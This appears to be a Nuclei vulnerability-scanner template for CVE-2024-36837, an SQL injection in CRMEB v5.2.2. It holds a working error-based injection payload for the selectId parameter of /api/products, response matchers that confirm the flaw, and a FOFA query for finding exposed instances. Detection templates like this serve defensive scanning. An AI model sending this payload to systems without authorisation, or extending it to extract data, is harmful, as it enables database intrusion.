id: CVE-2024-36837

info:
  name: CRMEB v.5.2.2 - SQL Injection
  author: DhiyaneshDk
  severity: high
  description: |
    SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.
  impact: |
    Attackers can execute SQL injection via the selectId parameter in getProductList to obtain sensitive database information.
  remediation: |
    Update CRMEB to a version later than 5.2.2 that patches the SQL injection vulnerability.
  reference:
    - https://github.com/phtcloud-dev/CVE-2024-36837
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36837
  classification:
    epss-score: 0.91665
    epss-percentile: 0.99694
    cpe: cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: crmeb
    product: crmeb
    fofa-query: title="CRMEB"
  tags: cve,cve2024,crmeb,sqli,vuln
variables:
  num: "{{rand_int(9000000, 9999999)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"
          - "SQLSTATE"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022079f55db809ef4fcdf5de49350cd9beb4c7ac0338e0dd200359669150f620d367022100a0be156430168db26dc5cc6ab58e2bf32b5f9c65571d339b43beaaa2db3d119e:922c64590222798bb761d5b6d8e72950